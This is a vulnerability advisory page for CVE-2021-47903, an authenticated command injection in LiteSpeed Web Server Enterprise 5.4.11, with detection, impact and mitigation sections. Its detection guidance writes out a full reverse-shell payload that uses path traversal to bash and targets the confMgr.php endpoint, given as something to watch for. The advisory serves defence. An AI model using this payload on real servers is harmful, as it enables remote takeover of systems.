CVE-2021-47903
Unknown Unknown - Not Provided
Authenticated Command Injection in LiteSpeed Web Server 5.4.11 Enables RCE

Publication date: 2026-01-23

Last updated on: 2026-01-23

Assigner: VulnCheck

Description
LiteSpeed Web Server Enterprise 5.4.11 contains an authenticated command injection vulnerability in the external app configuration interface. Authenticated administrators can inject shell commands through the 'Command' parameter in the server configuration, allowing remote code execution via path traversal and bash command injection.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-01-23
Last Modified
2026-01-23
Generated
2026-06-16
AI Q&A
2026-01-23
EPSS Evaluated
2026-06-15
NVD
CVE-2021-47903
EUVD
EUVD-2026-4277
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
litespeedtech lite_speed_web_server_enterprise 5.4.11
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-78 The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Detection Guidance

This vulnerability can be detected by checking for unauthorized or suspicious modifications in the external app configuration interface of LiteSpeed Web Server Enterprise version 5.4.11, specifically in the 'Command' parameter used for server configuration. Since exploitation requires authenticated access, monitoring administrative actions and reviewing server configuration changes is essential. A practical detection method includes inspecting HTTP POST requests to the /config/confMgr.php endpoint for unusual payloads in the 'path' or 'Command' parameters. For example, monitoring for commands similar to the payload: fcgi-bin/lsphp5/../../../../../bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/1234 0>&1' which initiates a reverse shell. Network monitoring tools can be used to detect unexpected outbound connections on uncommon ports (e.g., TCP port 1234 in the example). Specific commands to detect this might include searching server logs for POST requests to /config/confMgr.php or using network tools like tcpdump or netstat to identify suspicious connections. However, no exact detection commands are provided in the resources. [3, 2]

Executive Summary

This vulnerability is an authenticated command injection in LiteSpeed Web Server Enterprise version 5.4.11. Authenticated administrators can exploit the 'Command' parameter in the external application configuration interface to inject shell commands. This allows remote code execution through path traversal and bash command injection techniques, enabling attackers to execute arbitrary system commands on the server. [2, 3]

Impact Analysis

If exploited, this vulnerability can allow an authenticated user with administrative access to execute arbitrary commands on the server. This can lead to full system compromise, including unauthorized access, data theft, service disruption, and potentially taking control over the entire server environment. [2, 3]

Mitigation Strategies

Immediate mitigation steps include restricting administrative access to the LiteSpeed Web Server Enterprise configuration interface to trusted users only, ensuring strong authentication mechanisms are in place. Administrators should avoid using version 5.4.11 or upgrade to a patched version if available. Additionally, monitoring and auditing configuration changes in the external app configuration interface can help detect exploitation attempts. Since the vulnerability requires authenticated access, limiting privileges and enforcing least privilege principles can reduce risk. If possible, disable or restrict the use of the 'Command' parameter in server configuration or external app settings. Performing a graceful server restart after configuration changes is necessary to apply fixes or revert malicious changes. Applying network-level protections such as firewall rules to block unexpected outbound connections (e.g., reverse shells) can also help mitigate exploitation. [2, 3]

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2021-47903. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart